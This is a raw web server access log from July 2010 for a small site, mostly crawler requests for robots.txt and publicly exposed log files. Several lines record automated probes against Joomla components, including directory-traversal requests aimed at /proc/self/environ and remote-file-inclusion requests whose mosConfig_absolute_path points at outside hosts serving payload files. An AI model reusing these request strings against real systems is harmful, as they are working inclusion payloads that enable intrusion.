81.93.240.134 - - [01/Jul/2010:11:39:18 -0700] "GET /logs/access_100206.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.93.240.134 - - [01/Jul/2010:11:39:18 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.93.240.134 - - [01/Jul/2010:11:39:19 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:12:35:18 -0700] "GET /logs/access_100213.log HTTP/1.1" 200 76637 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:12:42:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:27 -0700] "GET /logs/access_100206.log HTTP/1.1" 200 93500 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:30 -0700] "GET /logs/access_100213.log HTTP/1.1" 200 76637 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:34 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 78076 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:39 -0700] "GET /logs/access_100227.log HTTP/1.1" 200 84763 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:43 -0700] "GET /logs/access_100306.log HTTP/1.1" 200 82540 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:48 -0700] "GET /logs/access_100313.log HTTP/1.1" 200 79502 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:53 -0700] "GET /logs/access_100320.log HTTP/1.1" 200 138251 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:20:58 -0700] "GET /logs/access_100327.log HTTP/1.1" 200 146768 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:21:03 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:13:21:08 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:13:36:33 -0700] "GET /logs/access_100529.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [01/Jul/2010:13:53:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:14:51:56 -0700] "GET /logs/access_100327.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
193.47.80.41 - - [01/Jul/2010:15:58:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [01/Jul/2010:15:58:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:16:07:48 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:17:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
88.250.57.232 - - [01/Jul/2010:16:33:20 -0700] "GET /logs/access_100630.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [01/Jul/2010:16:33:21 -0700] "GET /logs/access_100701.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:53:41 -0700] "GET /logs/?N=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:53:45 -0700] "GET /logs/access.log HTTP/1.1" 200 81142 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:53:50 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 70879 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:53:55 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:54:00 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 73111 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:54:05 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 116956 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:54:10 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:54:15 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1498 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:16:54:21 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:17:27:30 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:18:39:07 -0700] "GET /logs/access_100313.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.115.249 - - [01/Jul/2010:18:57:33 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [01/Jul/2010:18:57:33 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
192.228.230.3 - - [01/Jul/2010:19:34:45 -0700] "GET /logs/access.log HTTP/1.0" 200 83672 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:19:51:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:19:51:57 -0700] "GET /logs/access_100612.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
110.45.140.231 - - [01/Jul/2010:20:26:58 -0700] "GET /logs/?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.45.140.231 - - [01/Jul/2010:20:26:59 -0700] "GET /?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:33 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:34 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:36 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:38 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:40 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:30:59 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:31:02 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:31:04 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:31:06 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [01/Jul/2010:20:31:07 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:21:27:38 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:22:35:19 -0700] "GET /logs/access_100130.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.80.193.39 - - [01/Jul/2010:23:03:31 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; IEMB3)" "virtualsupplynet.com"
77.88.31.246 - - [01/Jul/2010:23:38:44 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.115.111.249 - - [02/Jul/2010:00:04:04 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [02/Jul/2010:00:04:24 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
208.115.111.249 - - [02/Jul/2010:00:04:30 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.virtualsupplynet.com"
216.13.106.196 - - [02/Jul/2010:00:23:00 -0700] "GET / HTTP/1.1" 200 779 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:00:42:31 -0700] "GET /logs/access_100619.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:01:46:41 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:02:53:11 -0700] "GET /logs/access_100320.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:03:55:04 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
195.190.166.35 - - [02/Jul/2010:04:04:09 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
195.190.166.35 - - [02/Jul/2010:04:04:10 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:04:59:02 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 78076 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:44 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:44 -0700] "GET /logs/access_100206.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:45 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:45 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:46 -0700] "GET /logs/access_100206.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.63.60.50 - - [02/Jul/2010:05:01:46 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
195.189.95.54 - - [02/Jul/2010:05:30:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
195.189.95.54 - - [02/Jul/2010:05:30:23 -0700] "GET /index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:06:00:37 -0700] "GET /logs/access_100306.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:07:02:03 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:08:07:10 -0700] "GET /logs/access_100206.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:08:38:58 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:08:38:59 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:08:39:00 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:08:39:01 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:00:05 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:00:07 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:09:06:45 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:31 -0700] "GET /logs/access_100206.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:32 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:32 -0700] "GET /logs/access_100206.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:32 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:32 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
222.236.47.182 - - [02/Jul/2010:09:49:33 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:10:08:47 -0700] "GET /logs/access_100605.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
207.58.162.113 - - [02/Jul/2010:11:17:24 -0700] "GET /logs/index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
207.58.162.113 - - [02/Jul/2010:11:17:24 -0700] "GET /index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
88.250.57.232 - - [02/Jul/2010:16:32:24 -0700] "GET /logs/access_100701.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [02/Jul/2010:16:32:25 -0700] "GET /logs/access_100702.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"